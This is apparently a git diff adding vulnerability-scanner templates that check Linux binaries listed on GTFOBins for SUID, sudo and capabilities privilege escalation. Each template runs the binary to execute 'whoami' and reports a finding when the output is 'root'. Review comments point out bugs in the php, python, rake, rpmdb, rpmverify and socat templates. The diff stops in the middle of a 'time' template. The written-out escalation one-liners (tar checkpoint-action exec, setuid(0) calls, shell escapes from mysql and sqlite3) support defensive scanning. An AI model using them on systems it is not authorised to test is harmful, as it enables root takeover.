diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml new file mode 100644 index 0000000000..e01b2bda0f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-mysql + +info: + name: MySQL - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mysql/ + metadata: + verified: true + tags: code,linux,mysql,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mysql -e '\! whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mysql -e '\! whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml new file mode 100644 index 0000000000..c8f76a4dae --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-nawk + +info: + name: nawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nawk/ + metadata: + verified: true + tags: code,linux,nawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo nawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml new file mode 100644 index 0000000000..770007cde1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nice + +info: + name: Nice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nice/ + metadata: + verified: true + tags: code,linux,nice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml new file mode 100644 index 0000000000..40c9dc4f9d --- /dev/null 
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-node + +info: + name: Node - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/node/ + metadata: + verified: true + tags: code,linux,node,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #SUDO + - engine: + - sh + - bash + source: | + sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #Capabilities + - engine: + - sh + - bash + source: | + node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml new file mode 100644 index 0000000000..9052644225 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-nsenter + +info: + name: Nsenter - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nsenter/ + metadata: + verified: true + tags: code,linux,nsenter,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nsenter whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nsenter whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml new file mode 100644 index 0000000000..3e8069ab8c --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-perl + +info: + name: Perl - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/perl/ + metadata: + verified: true + tags: code,linux,perl,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + perl -e 'exec "whoami";' + + #SUDO + - engine: + - sh + - bash + source: | + sudo perl -e 'exec "whoami";' + + #Capabilities + - engine: + - sh + - bash + source: | + perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml new file mode 100644 index 0000000000..98caa29600 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-pexec + +info: + name: pexec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/pexec/ + metadata: + verified: true + tags: code,linux,pexec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + pexec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo pexec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml new file mode 100644 index 0000000000..4e0a6c6539 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml 
@@ -0,0 +1,54 @@ +id: privilege-escalation-php + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/php/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + php -r 'system("whoami");' + + #SUDO + - engine: + - sh + - bash + source: | + sudo php -r 'system("whoami");' + + #Capabilities + - engine: + - sh + - bash + source: | + php -r "posix_setuid(0); system("whoami");" + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml new file mode 100644 index 0000000000..ac416e2499 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-posh + +info: + name: posh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/posh/ + metadata: + verified: true + tags: code,linux,posh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + posh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo posh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
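Review bot: The `#Capabilities` step `php -r "posix_setuid(0); system("whoami");"` nests double quotes inside a double-quoted shell word, so the shell hands PHP `posix_setuid(0); system(whoami);` and the bare `whoami` is an undefined constant — an Error on PHP 8 (at best a warning-plus-fallback on PHP 7), so the step never reports root. Quote it like the other two steps: `php -r 'posix_setuid(0); system("whoami");'`.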
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml new file mode 100644 index 0000000000..3dbea834d8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-python + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/python/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + python -c 'import os; os.system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo python -c 'import os; os.system("whoami")' + + #Capabilities + - engine: + - sh + - bash + source: | + python -c 'import os; os.setuid(0); os.system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml new file mode 100644 index 0000000000..feb5b3bf43 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml 
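Review bot: `name: PHP - Privilege Escalation` and `tags: code,linux,php,privesc` in the python template are copy-pasted from the php one, so findings from this file are mislabelled and a `python` tag filter will not select it; change them to `name: Python - Privilege Escalation` and `tags: code,linux,python,privesc`. Separately, all three steps call `python`, which many current distributions no longer provide as an unversioned name (only `python3`); presumably a missing interpreter is just a silent false negative here, so a comment noting that limitation, or a parallel `python3` step, would help.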
@@ -0,0 +1,46 @@ +id: privilege-escalation-rake + +info: + name: Rake - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rake/ + metadata: + verified: true + tags: code,linux,rake,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rake -p '`whoami 1>&0`' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rake -p '`whoami 1>&0`' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml new file mode 100644 index 0000000000..f4d8ce5ebc --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rc + +info: + name: RC - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rc/ + metadata: + verified: true + tags: code,linux,rc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rc -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rc -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml new file mode 100644 index 0000000000..af24cc0803 --- /dev/null 
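Review bot: The redirect in `rake -p '`whoami 1>&0`'` (both the `#SUID` and `#SUDO` steps) sends whoami's output to file descriptor 0, which in a non-interactive executor is a pipe or /dev/null, so the result never reaches `code_2_response`/`code_3_response` and the matcher cannot fire. The `1>&0` comes from the interactive-shell form on GTFOBins and is unnecessary for a one-shot command: with `-p` rake prints the value of the expression and a backtick captures the command's stdout, so `rake -p '`whoami`'` should surface the username directly; I have not run this, so verify on a target.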
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rlwrap + +info: + name: rlwrap - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rlwrap/ + metadata: + verified: true + tags: code,linux,rlwrap,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rlwrap whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo rlwrap whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml new file mode 100644 index 0000000000..026bdc56c8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpm + +info: + name: rpm - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpm/ + metadata: + verified: true + tags: code,linux,rpm,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpm --pipe 'whoami 0<&1' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpm --pipe 'whoami 0<&1' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml new file mode 100644 index 0000000000..f7d4dc0cc1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpmdb + +info: + name: rpmdb - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmdb/ + metadata: + verified: true + tags: code,linux,rpmdb,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmdb --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmdb --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml new file mode 100644 index 0000000000..37e53c761e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml 
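Review bot: In `rpmdb --eval '%(whoami 1>&2)'` the `1>&2` diverts whoami's output to stderr, so the `%(...)` expansion that `--eval` prints to stdout is empty and the match then depends on whether the code protocol folds stderr into `code_2_response`/`code_3_response`; dropping the redirect, `rpmdb --eval '%(whoami)'`, puts the username on stdout where the DSL matcher certainly sees it. The same redirect appears in the rpmverify template in the next hunk. I am assuming the executor's capture semantics from the matcher expressions, not from anything in this hunk.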
@@ -0,0 +1,46 @@ +id: privilege-escalation-rpmverify + +info: + name: rpmverify - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmverify/ + metadata: + verified: true + tags: code,linux,rpmverify,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmverify --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmverify --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml new file mode 100644 index 0000000000..a2b1e9a9b9 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-ruby + +info: + name: Ruby - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ruby/ + metadata: + verified: true + tags: code,linux,ruby,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ruby -e 'exec "whoami"' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ruby -e 'exec "whoami"' + + #Capabilities + - engine: + - sh + - bash + source: | + ruby -e 'Process::Sys.setuid(0); exec "whoami"' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml new file mode 100644 index 0000000000..76a2e3d181 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-run-parts + +info: + name: run-parts - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/run-parts/ + metadata: + verified: true + tags: code,linux,run-parts,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + run-parts --new-session --regex 'whoami' /bin + + #SUDO + - engine: + - sh + - bash + source: | + sudo run-parts --new-session --regex 'whoami' /bin + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml new file mode 100644 index 0000000000..85806eea1f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-sash + +info: + name: sash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sash/ + metadata: + verified: true + tags: code,linux,sash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml new file mode 100644 index 0000000000..c3fd764778 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-slsh + +info: + name: slsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/slsh/ + metadata: + verified: true + tags: code,linux,slsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + slsh -e 'system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo slsh -e 'system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml new file mode 100644 index 0000000000..9016697ffb --- /dev/null 
+++ b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-socat + +info: + name: Socat - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/socat/ + metadata: + verified: true + tags: code,linux,socat,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + socat stdin exec:whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo socat stdin exec:whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml new file mode 100644 index 0000000000..fee1f47c81 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-softlimit + +info: + name: softlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/softlimit/ + metadata: + verified: true + tags: code,linux,softlimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + softlimit whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo softlimit whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
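Review bot: `socat stdin exec:whoami` uses the `STDIN` address, which socat reads and writes on file descriptor 0, so whoami's output is written back to the executor's stdin rather than to stdout and is unlikely to appear in `code_2_response`/`code_3_response`. The `-` (STDIO) address reads fd 0 and writes fd 1: `socat - exec:whoami`. This reflects my reading of the socat address semantics; please confirm against a run.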
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml new file mode 100644 index 0000000000..7736c9b0aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sqlite3 + +info: + name: sqlite3 - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sqlite3/ + metadata: + verified: true + tags: code,linux,sqlite3,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sqlite3 /dev/null '.shell whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sqlite3 /dev/null '.shell whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml new file mode 100644 index 0000000000..11bf610587 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-ssh-agent + +info: + name: ssh-agent - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ssh-agent/ + metadata: + verified: true + tags: code,linux,ssh-agent,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ssh-agent whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ssh-agent whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml new file mode 100644 index 0000000000..1b258a9690 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sshpass + +info: + name: sshpass - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sshpass/ + metadata: + verified: true + tags: code,linux,sshpass,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sshpass whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo sshpass whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml new file mode 100644 index 0000000000..55299d5aa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-stdbuf + +info: + name: stdbuf - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/stdbuf/ + metadata: + verified: true + tags: code,linux,stdbuf,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + stdbuf -i0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo stdbuf -i0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml new file mode 100644 index 0000000000..718fe1b08b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml 
@@ -0,0 +1,46 @@ +id: privilege-escalation-strace + +info: + name: strace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/strace/ + metadata: + verified: true + tags: code,linux,strace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + strace -o /dev/null whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo strace -o /dev/null whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml new file mode 100644 index 0000000000..50b0da6204 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tar + +info: + name: tar - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tar/ + metadata: + verified: true + tags: code,linux,tar,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file 
diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml new file mode 100644 index 0000000000..4b81a10008 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tcsh + +info: + name: tcsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tcsh/ + metadata: + verified: true + tags: code,linux,tcsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tcsh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo tcsh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml new file mode 100644 index 0000000000..58ed4b5fc7 